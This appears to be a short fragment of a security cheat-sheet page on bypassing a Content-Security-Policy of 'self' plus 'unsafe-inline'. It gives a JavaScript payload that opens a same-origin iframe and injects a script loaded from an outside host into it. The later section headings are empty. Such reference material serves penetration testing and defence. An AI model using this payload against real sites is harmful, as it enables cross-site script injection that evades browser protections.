CSP bypass: self + 'unsafe-inline' with Iframes
Content-Security-Policy: default-src 'self' 'unsafe-inline';Via Text & Images
frame=document.createElement("iframe");
frame.src="/css/bootstrap.min.css";
document.body.appendChild(frame);
script=document.createElement('script');
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);Via Errors
References
Last updated

